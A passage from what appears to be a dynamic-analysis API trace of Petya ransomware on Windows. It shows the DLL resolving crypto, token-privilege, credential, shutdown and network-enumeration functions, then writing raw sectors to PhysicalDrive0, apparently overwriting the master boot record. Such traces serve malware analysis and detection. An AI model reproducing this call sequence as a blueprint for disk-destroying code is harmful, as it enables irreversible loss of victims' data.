lpflOldProtect=0x3cac78*=0x4) returned 1 [0034.116] FreeLibrary (hLibModule=0x74c70000) returned 1 [0034.156] CreateFileW (lpFileName="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll" (normalized: "c:\\users\\hjrd1k~1\\desktop\\petya.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0034.156] GetFileSize (in: hFile=0xbc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x58778 [0034.156] CloseHandle (hObject=0xbc) returned 1 [0034.156] CreateFileW (lpFileName="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll" (normalized: "c:\\users\\hjrd1k~1\\desktop\\petya.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc [0034.167] WriteFile (in: hFile=0xbc, lpBuffer=0x4edb68*, nNumberOfBytesToWrite=0x58778, lpNumberOfBytesWritten=0x3cac74, lpOverlapped=0x0 | out: lpBuffer=0x4edb68*, lpNumberOfBytesWritten=0x3cac74*=0x58778, lpOverlapped=0x0) returned 1 [0034.179] CloseHandle (hObject=0xbc) returned 1 [0034.190] DeleteFileW (lpFileName="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll" (normalized: "c:\\users\\hjrd1k~1\\desktop\\petya.dll")) returned 1 [0034.197] VirtualProtect (in: lpAddress=0xed000, dwSize=0x8546, flNewProtect=0x4, lpflOldProtect=0x3cac50 | out: lpflOldProtect=0x3cac50*=0x2) returned 1 [0034.197] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74e70000 [0034.197] GetProcAddress (hModule=0x74e70000, lpProcName="ConnectNamedPipe") returned 0x74f040fb [0034.198] GetProcAddress (hModule=0x74e70000, lpProcName="GetModuleHandleW") returned 0x74e834b0 [0034.198] GetProcAddress (hModule=0x74e70000, lpProcName="CreateNamedPipeW") returned 0x74f0414b [0034.198] GetProcAddress (hModule=0x74e70000, lpProcName="TerminateThread") returned 0x74e87a2f [0034.198] GetProcAddress (hModule=0x74e70000, lpProcName="DisconnectNamedPipe") returned 0x74f041df [0034.198] GetProcAddress (hModule=0x74e70000, lpProcName="FlushFileBuffers") returned 0x74e8469b [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="GetTempPathW") returned 0x74e9d4dc [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="GetProcAddress") returned 0x74e81222 [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="DeleteFileW") returned 0x74e889b3 [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="FreeLibrary") returned 0x74e834c8 [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="GlobalAlloc") returned 0x74e8588e [0034.199] GetProcAddress (hModule=0x74e70000, lpProcName="LoadLibraryW") returned 0x74e8492b [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="GetComputerNameExW") returned 0x74eabb9e [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="GlobalFree") returned 0x74e85558 [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="ExitProcess") returned 0x74e87a10 [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="GetVersionExW") returned 0x74e81ae5 [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="GetModuleFileNameW") returned 0x74e84950 [0034.200] GetProcAddress (hModule=0x74e70000, lpProcName="DisableThreadLibraryCalls") returned 0x74e848e5 [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="ResumeThread") returned 0x74e843ef [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="GetEnvironmentVariableW") returned 0x74e81b48 [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="GetFileSize") returned 0x74e8196e [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="SetFilePointer") returned 0x74e817d1 [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="SetLastError") returned 0x74e811a9 [0034.201] GetProcAddress (hModule=0x74e70000, lpProcName="LoadResource") returned 0x74e8594c [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="GetCurrentThread") returned 0x74e817ec [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="OpenProcess") returned 0x74e81986 [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="GetSystemDirectoryW") returned 0x74e85063 [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="SizeofResource") returned 0x74e85ac9 [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="GetLocalTime") returned 0x74e85aa6 [0034.202] GetProcAddress (hModule=0x74e70000, lpProcName="Process32FirstW") returned 0x74ea8baf [0034.203] GetProcAddress (hModule=0x74e70000, lpProcName="LockResource") returned 0x74e85959 [0034.203] GetProcAddress (hModule=0x74e70000, lpProcName="Process32NextW") returned 0x74ea896c [0034.253] GetProcAddress (hModule=0x74e70000, lpProcName="GetModuleHandleA") returned 0x74e81245 [0034.265] GetProcAddress (hModule=0x74e70000, lpProcName="lstrcatW") returned 0x74ea828e [0034.266] GetProcAddress (hModule=0x74e70000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ea735f [0034.266] GetProcAddress (hModule=0x74e70000, lpProcName="GetCurrentProcess") returned 0x74e81809 [0034.272] GetProcAddress (hModule=0x74e70000, lpProcName="VirtualFree") returned 0x74e8186e [0034.274] GetProcAddress (hModule=0x74e70000, lpProcName="VirtualAlloc") returned 0x74e81856 [0034.275] GetProcAddress (hModule=0x74e70000, lpProcName="LoadLibraryA") returned 0x74e849d7 [0034.275] GetProcAddress (hModule=0x74e70000, lpProcName="VirtualProtect") returned 0x74e8435f [0034.275] GetProcAddress (hModule=0x74e70000, lpProcName="WideCharToMultiByte") returned 0x74e8170d [0034.275] GetProcAddress (hModule=0x74e70000, lpProcName="GetExitCodeProcess") returned 0x74e9174d [0034.275] GetProcAddress (hModule=0x74e70000, lpProcName="WaitForMultipleObjects") returned 0x74e84220 [0034.276] GetProcAddress (hModule=0x74e70000, lpProcName="CreateProcessW") returned 0x74e8103d [0034.276] GetProcAddress (hModule=0x74e70000, lpProcName="PeekNamedPipe") returned 0x74f04821 [0034.276] GetProcAddress (hModule=0x74e70000, lpProcName="GetTempFileNameW") returned 0x74ead1b6 [0034.278] GetProcAddress (hModule=0x74e70000, lpProcName="InterlockedExchange") returned 0x74e81462 [0034.278] GetProcAddress (hModule=0x74e70000, lpProcName="LeaveCriticalSection") returned 0x772d2270 [0034.278] GetProcAddress (hModule=0x74e70000, lpProcName="MultiByteToWideChar") returned 0x74e8192e [0034.278] GetProcAddress (hModule=0x74e70000, lpProcName="CreateFileA") returned 0x74e853c6 [0034.279] GetProcAddress (hModule=0x74e70000, lpProcName="GetTickCount") returned 0x74e8110c [0034.279] GetProcAddress (hModule=0x74e70000, lpProcName="CreateThread") returned 0x74e834d5 [0034.279] GetProcAddress (hModule=0x74e70000, lpProcName="LocalFree") returned 0x74e82d3c [0034.279] GetProcAddress (hModule=0x74e70000, lpProcName="FindNextFileW") returned 0x74e854ee [0034.279] GetProcAddress (hModule=0x74e70000, lpProcName="CreateFileMappingW") returned 0x74e81909 [0034.280] GetProcAddress (hModule=0x74e70000, lpProcName="LocalAlloc") returned 0x74e8168c [0034.280] GetProcAddress (hModule=0x74e70000, lpProcName="FindClose") returned 0x74e84442 [0034.280] GetProcAddress (hModule=0x74e70000, lpProcName="GetFileSizeEx") returned 0x74e859e2 [0034.281] GetProcAddress (hModule=0x74e70000, lpProcName="CreateFileW") returned 0x74e83f5c [0034.281] GetProcAddress (hModule=0x74e70000, lpProcName="Sleep") returned 0x74e810ff [0034.282] GetProcAddress (hModule=0x74e70000, lpProcName="FlushViewOfFile") returned 0x74eab909 [0034.282] GetProcAddress (hModule=0x74e70000, lpProcName="GetLogicalDrives") returned 0x74e85371 [0034.282] GetProcAddress (hModule=0x74e70000, lpProcName="WaitForSingleObject") returned 0x74e81136 [0034.282] GetProcAddress (hModule=0x74e70000, lpProcName="GetDriveTypeW") returned 0x74e8418b [0034.283] GetProcAddress (hModule=0x74e70000, lpProcName="UnmapViewOfFile") returned 0x74e81826 [0034.283] GetProcAddress (hModule=0x74e70000, lpProcName="MapViewOfFile") returned 0x74e818f1 [0034.283] GetProcAddress (hModule=0x74e70000, lpProcName="FindFirstFileW") returned 0x74e84435 [0034.283] GetProcAddress (hModule=0x74e70000, lpProcName="CloseHandle") returned 0x74e81410 [0034.283] GetProcAddress (hModule=0x74e70000, lpProcName="DeviceIoControl") returned 0x74e8322f [0034.284] GetProcAddress (hModule=0x74e70000, lpProcName="GetLastError") returned 0x74e811c0 [0034.284] GetProcAddress (hModule=0x74e70000, lpProcName="GetSystemDirectoryA") returned 0x74e9b66c [0034.284] GetProcAddress (hModule=0x74e70000, lpProcName="ReadFile") returned 0x74e83ed3 [0034.284] GetProcAddress (hModule=0x74e70000, lpProcName="WriteFile") returned 0x74e81282 [0034.285] GetProcAddress (hModule=0x74e70000, lpProcName="GetProcessHeap") returned 0x74e814e9 [0034.285] GetProcAddress (hModule=0x74e70000, lpProcName="InitializeCriticalSection") returned 0x772e2c42 [0034.285] GetProcAddress (hModule=0x74e70000, lpProcName="HeapReAlloc") returned 0x772f1f6e [0034.285] GetProcAddress (hModule=0x74e70000, lpProcName="GetWindowsDirectoryW") returned 0x74e843e2 [0034.286] GetProcAddress (hModule=0x74e70000, lpProcName="EnterCriticalSection") returned 0x772d22b0 [0034.287] GetProcAddress (hModule=0x74e70000, lpProcName="HeapFree") returned 0x74e814c9 [0034.287] GetProcAddress (hModule=0x74e70000, lpProcName="SetFilePointerEx") returned 0x74e9c807 [0034.287] GetProcAddress (hModule=0x74e70000, lpProcName="HeapAlloc") returned 0x772de026 [0034.287] GetProcAddress (hModule=0x74e70000, lpProcName="FindResourceW") returned 0x74e85971 [0034.287] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76480000 [0034.288] GetProcAddress (hModule=0x76480000, lpProcName="ExitWindowsEx") returned 0x764e1497 [0034.288] GetProcAddress (hModule=0x76480000, lpProcName="wsprintfA") returned 0x764aae5f [0034.288] GetProcAddress (hModule=0x76480000, lpProcName="wsprintfW") returned 0x764be061 [0034.288] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75f60000 [0034.289] GetProcAddress (hModule=0x75f60000, lpProcName="CryptGenRandom") returned 0x75f6dfc8 [0034.289] GetProcAddress (hModule=0x75f60000, lpProcName="CryptAcquireContextA") returned 0x75f691dd [0034.289] GetProcAddress (hModule=0x75f60000, lpProcName="CryptExportKey") returned 0x75f691ea [0034.289] GetProcAddress (hModule=0x75f60000, lpProcName="CryptAcquireContextW") returned 0x75f6df14 [0034.289] GetProcAddress (hModule=0x75f60000, lpProcName="CreateProcessAsUserW") returned 0x75f6c592 [0034.290] GetProcAddress (hModule=0x75f60000, lpProcName="InitiateSystemShutdownExW") returned 0x75fbdb3a [0034.290] GetProcAddress (hModule=0x75f60000, lpProcName="DuplicateTokenEx") returned 0x75f6ca24 [0034.290] GetProcAddress (hModule=0x75f60000, lpProcName="SetTokenInformation") returned 0x75f69a92 [0034.290] GetProcAddress (hModule=0x75f60000, lpProcName="GetTokenInformation") returned 0x75f7431c [0034.291] GetProcAddress (hModule=0x75f60000, lpProcName="GetSidSubAuthorityCount") returned 0x75f70e0c [0034.291] GetProcAddress (hModule=0x75f60000, lpProcName="OpenThreadToken") returned 0x75f7432c [0034.291] GetProcAddress (hModule=0x75f60000, lpProcName="GetSidSubAuthority") returned 0x75f70e24 [0034.291] GetProcAddress (hModule=0x75f60000, lpProcName="AdjustTokenPrivileges") returned 0x75f7418e [0034.291] GetProcAddress (hModule=0x75f60000, lpProcName="LookupPrivilegeValueW") returned 0x75f741b3 [0034.292] GetProcAddress (hModule=0x75f60000, lpProcName="OpenProcessToken") returned 0x75f74304 [0034.292] GetProcAddress (hModule=0x75f60000, lpProcName="SetThreadToken") returned 0x75f6c7ce [0034.292] GetProcAddress (hModule=0x75f60000, lpProcName="CredEnumerateW") returned 0x75fa7481 [0034.292] GetProcAddress (hModule=0x75f60000, lpProcName="CredFree") returned 0x75f6b2ec [0034.292] GetProcAddress (hModule=0x75f60000, lpProcName="SetSecurityDescriptorDacl") returned 0x75f7415e [0034.293] GetProcAddress (hModule=0x75f60000, lpProcName="InitializeSecurityDescriptor") returned 0x75f74620 [0034.293] GetProcAddress (hModule=0x75f60000, lpProcName="CryptDestroyKey") returned 0x75f6c51a [0034.293] GetProcAddress (hModule=0x75f60000, lpProcName="CryptGenKey") returned 0x75f68ee9 [0034.293] GetProcAddress (hModule=0x75f60000, lpProcName="CryptEncrypt") returned 0x75f8779b [0034.294] GetProcAddress (hModule=0x75f60000, lpProcName="CryptImportKey") returned 0x75f6c532 [0034.294] GetProcAddress (hModule=0x75f60000, lpProcName="CryptSetKeyParam") returned 0x75f877b3 [0034.294] GetProcAddress (hModule=0x75f60000, lpProcName="CryptReleaseContext") returned 0x75f6e124 [0034.294] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75150000 [0034.306] GetProcAddress (hModule=0x75150000, lpProcName="CommandLineToArgvW") returned 0x75169ee8 [0034.306] GetProcAddress (hModule=0x75150000, lpProcName="SHGetFolderPathW") returned 0x751d5708 [0034.306] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75e00000 [0034.306] GetProcAddress (hModule=0x75e00000, lpProcName="CoCreateGuid") returned 0x75e415d5 [0034.307] GetProcAddress (hModule=0x75e00000, lpProcName="CoTaskMemFree") returned 0x75e56f41 [0034.307] GetProcAddress (hModule=0x75e00000, lpProcName="StringFromCLSID") returned 0x75e1eb17 [0034.307] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76a00000 [0034.342] GetProcAddress (hModule=0x76a00000, lpProcName="CryptStringToBinaryW") returned 0x76a35f65 [0034.343] GetProcAddress (hModule=0x76a00000, lpProcName="CryptBinaryToStringW") returned 0x76a3a546 [0034.343] GetProcAddress (hModule=0x76a00000, lpProcName="CryptDecodeObjectEx") returned 0x76a0d718 [0034.343] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76890000 [0034.343] GetProcAddress (hModule=0x76890000, lpProcName="PathAppendW") returned 0x768a81ef [0034.344] GetProcAddress (hModule=0x76890000, lpProcName="StrToIntW") returned 0x768a50be [0034.344] GetProcAddress (hModule=0x76890000, lpProcName="PathFindFileNameW") returned 0x768abb71 [0034.344] GetProcAddress (hModule=0x76890000, lpProcName="PathFileExistsW") returned 0x768a45bf [0034.345] GetProcAddress (hModule=0x76890000, lpProcName="StrCmpW") returned 0x768a8277 [0034.345] GetProcAddress (hModule=0x76890000, lpProcName="StrCmpIW") returned 0x768aa147 [0034.345] GetProcAddress (hModule=0x76890000, lpProcName="StrChrW") returned 0x768a4640 [0034.345] GetProcAddress (hModule=0x76890000, lpProcName="StrCatW") returned 0x768ce105 [0034.345] GetProcAddress (hModule=0x76890000, lpProcName="StrStrW") returned 0x7689e52d [0034.346] GetProcAddress (hModule=0x76890000, lpProcName="PathFindExtensionW") returned 0x768aa1b9 [0034.346] GetProcAddress (hModule=0x76890000, lpProcName="PathCombineW") returned 0x768ac39c [0034.346] GetProcAddress (hModule=0x76890000, lpProcName="StrStrIW") returned 0x768a46e9 [0034.346] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74cb0000 [0034.358] GetProcAddress (hModule=0x74cb0000, lpProcName="GetIpNetTable") returned 0x74cbe52a [0034.358] GetProcAddress (hModule=0x74cb0000, lpProcName="GetAdaptersInfo") returned 0x74cb9263 [0034.358] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x76900000 [0034.361] GetProcAddress (hModule=0x76900000, lpProcName=0xc) returned 0x7690b131 [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0x34) returned 0x76917673 [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0x97) returned 0x76906a8a [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0xe) returned 0x76902d57 [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0xa) returned 0x76903084 [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0x4) returned 0x76906bdd [0034.362] GetProcAddress (hModule=0x76900000, lpProcName=0xb) returned 0x7690311b [0034.363] GetProcAddress (hModule=0x76900000, lpProcName=0x12) returned 0x76906989 [0034.363] GetProcAddress (hModule=0x76900000, lpProcName=0x10) returned 0x76906b0e [0034.363] GetProcAddress (hModule=0x76900000, lpProcName=0x13) returned 0x76906f01 [0034.363] GetProcAddress (hModule=0x76900000, lpProcName=0x9) returned 0x76902d8b [0034.363] GetProcAddress (hModule=0x76900000, lpProcName=0x3) returned 0x76903918 [0034.364] GetProcAddress (hModule=0x76900000, lpProcName=0x17) returned 0x76903eb8 [0034.364] GetProcAddress (hModule=0x76900000, lpProcName=0x73) returned 0x76903ab2 [0034.364] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74c80000 [0034.370] GetProcAddress (hModule=0x74c80000, lpProcName="WNetOpenEnumW") returned 0x74c82f06 [0034.371] GetProcAddress (hModule=0x74c80000, lpProcName="WNetEnumResourceW") returned 0x74c83058 [0034.371] GetProcAddress (hModule=0x74c80000, lpProcName="WNetCancelConnection2W") returned 0x74c88cd1 [0034.371] GetProcAddress (hModule=0x74c80000, lpProcName="WNetAddConnection2W") returned 0x74c84744 [0034.371] GetProcAddress (hModule=0x74c80000, lpProcName="WNetCloseEnum") returned 0x74c82dd6 [0034.371] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74c60000 [0034.391] GetProcAddress (hModule=0x74c60000, lpProcName="NetServerEnum") returned 0x74c12f61 [0034.395] GetProcAddress (hModule=0x74c60000, lpProcName="NetApiBufferFree") returned 0x74c513d2 [0034.395] GetProcAddress (hModule=0x74c60000, lpProcName="NetServerGetInfo") returned 0x74c33cfa [0034.395] LoadLibraryA (lpLibFileName="DHCPSAPI.DLL") returned 0x74bf0000 [0034.426] GetProcAddress (hModule=0x74bf0000, lpProcName="DhcpEnumSubnetClients") returned 0x74bf77b5 [0034.426] GetProcAddress (hModule=0x74bf0000, lpProcName="DhcpRpcFreeMemory") returned 0x74bf79ed [0034.427] GetProcAddress (hModule=0x74bf0000, lpProcName="DhcpGetSubnetInfo") returned 0x74bf7003 [0034.427] GetProcAddress (hModule=0x74bf0000, lpProcName="DhcpEnumSubnets") returned 0x74bf6b7c [0034.427] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76940000 [0034.427] GetProcAddress (hModule=0x76940000, lpProcName="malloc") returned 0x76949cee [0034.427] GetProcAddress (hModule=0x76940000, lpProcName="_itoa") returned 0x76964218 [0034.428] GetProcAddress (hModule=0x76940000, lpProcName="free") returned 0x76949894 [0034.428] GetProcAddress (hModule=0x76940000, lpProcName="memset") returned 0x76949790 [0034.428] GetProcAddress (hModule=0x76940000, lpProcName="rand") returned 0x7694c070 [0034.428] GetProcAddress (hModule=0x76940000, lpProcName="memcpy") returned 0x76949910 [0034.428] VirtualProtect (in: lpAddress=0xed000, dwSize=0x8546, flNewProtect=0x2, lpflOldProtect=0x3cac50 | out: lpflOldProtect=0x3cac50*=0x4) returned 1 [0034.429] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xff768 | out: lpWSAData=0xff768) returned 0 [0034.445] CommandLineToArgvW (in: lpCmdLine="1IÄG⯞ࠀ졨畑Ⴑ甝⯞฀ⰀIÄGⷞࠀ﹀H￿￿", pNumArgs=0x3c621c | out: pNumArgs=0x3c621c) returned 0x48b3c0*="1IÄG⯞ࠀ졨畑Ⴑ甝⯞฀ⰀIÄGⷞࠀ﹀H￿￿" [0034.445] StrToIntW (lpSrc="1IÄG⯞ࠀ졨畑Ⴑ甝⯞฀ⰀIÄGⷞࠀ﹀H￿￿") returned 1 [0034.445] LocalFree (hMem=0x48b3c0) returned 0x0 [0034.446] PathFindFileNameW (pszPath="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll") returned="Petya.dll" [0034.446] PathCombineW (in: pszDest=0x3c5c0c, pszDir="C:\\Windows\\", pszFile="Petya.dll" | out: pszDest="C:\\Windows\\Petya.dll") returned="C:\\Windows\\Petya.dll" [0034.446] PathFindExtensionW (pszPath="C:\\Windows\\Petya.dll") returned=".dll" [0034.446] PathFileExistsW (pszPath="C:\\Windows\\Petya") returned 0 [0034.446] CreateFileW (lpFileName="C:\\Windows\\Petya" (normalized: "c:\\windows\\petya"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x138 [0034.447] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0034.447] DeviceIoControl (in: hDevice=0x13c, dwIoControlCode=0x70000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x3c6208, nOutBufferSize=0x18, lpBytesReturned=0x3c6204, lpOverlapped=0x0 | out: lpOutBuffer=0x3c6208, lpBytesReturned=0x3c6204, lpOverlapped=0x0) returned 1 [0034.447] LocalAlloc (uFlags=0x0, uBytes=0x1400) returned 0x532530 [0034.447] SetFilePointer (in: hFile=0x13c, lDistanceToMove=512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x200 [0034.447] WriteFile (in: hFile=0x13c, lpBuffer=0x532530*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c6204, lpOverlapped=0x0 | out: lpBuffer=0x532530*, lpNumberOfBytesWritten=0x3c6204*=0x200, lpOverlapped=0x0) returned 1 [0035.178] LocalFree (hMem=0x532530) returned 0x0 [0035.178] CloseHandle (hObject=0x13c) returned 1 [0035.178] GetSystemDirectoryA (in: lpBuffer=0x3c55d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.179] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.179] DeviceIoControl (in: hDevice=0x13c, dwIoControlCode=0x560000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x3c57e0, nOutBufferSize=0x20, lpBytesReturned=0x3c5820, lpOverlapped=0x0 | out: lpOutBuffer=0x3c57e0, lpBytesReturned=0x3c5820, lpOverlapped=0x0) returned 1 [0035.180] _itoa (in: _Val=0, _DstBuf=0x3c5800, _Radix=10 | out: _DstBuf="0") returned="0" [0035.180] CloseHandle (hObject=0x13c) returned 1 [0035.180] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0x80100000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.181] DeviceIoControl (in: hDevice=0x13c, dwIoControlCode=0x70048, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x3c57a0, nOutBufferSize=0x90, lpBytesReturned=0x3c5834, lpOverlapped=0x0 | out: lpOutBuffer=0x3c57a0, lpBytesReturned=0x3c5834, lpOverlapped=0x0) returned 1 [0035.181] CloseHandle (hObject=0x13c) returned 1 [0035.181] CryptAcquireContextA (in: phProv=0x3c5834, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3c5834*=0x532570) returned 1 [0035.395] CryptGenRandom (in: hProv=0x532570, dwLen=0x3c, pbBuffer=0x3c6164 | out: pbBuffer=0x3c6164) returned 1 [0035.395] CryptReleaseContext (hProv=0x532570, dwFlags=0x0) returned 1 [0035.395] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.396] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.396] ReadFile (in: hFile=0x13c, lpBuffer=0x3c5c58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x3c5c58*, lpNumberOfBytesRead=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.397] CloseHandle (hObject=0x13c) returned 1 [0035.397] CryptAcquireContextA (in: phProv=0x3c5834, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3c5834*=0x532570) returned 1 [0035.398] CryptGenRandom (in: hProv=0x532570, dwLen=0x20, pbBuffer=0x3c5e59 | out: pbBuffer=0x3c5e59) returned 1 [0035.398] CryptReleaseContext (hProv=0x532570, dwFlags=0x0) returned 1 [0035.398] CryptAcquireContextA (in: phProv=0x3c5834, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3c5834*=0x532570) returned 1 [0035.399] CryptGenRandom (in: hProv=0x532570, dwLen=0x8, pbBuffer=0x3c5e79 | out: pbBuffer=0x3c5e79) returned 1 [0035.399] CryptReleaseContext (hProv=0x532570, dwFlags=0x0) returned 1 [0035.400] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.400] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.401] WriteFile (in: hFile=0x13c, lpBuffer=0x535328*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535328*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.401] CloseHandle (hObject=0x13c) returned 1 [0035.402] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.402] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.402] WriteFile (in: hFile=0x13c, lpBuffer=0x535528*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535528*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.403] CloseHandle (hObject=0x13c) returned 1 [0035.403] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.404] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.404] WriteFile (in: hFile=0x13c, lpBuffer=0x535728*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535728*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.409] CloseHandle (hObject=0x13c) returned 1 [0035.409] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.410] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.410] WriteFile (in: hFile=0x13c, lpBuffer=0x535928*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535928*, lpNumberOfBytesWritten=0x3c5834*=0x200, lpOverlapped=0x0) returned 1 [0035.411] CloseHandle (hObject=0x13c) returned 1 [0035.411] CreateFileA (lpFileName="\\\\.\\PhysicalDrive0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0035.412] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.412] WriteFile (in: hFile=0x13c, lpBuffer=0x535b28*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3c5834, lpOverlapped=0x0 | out: lpBuffer=0x535b28*, 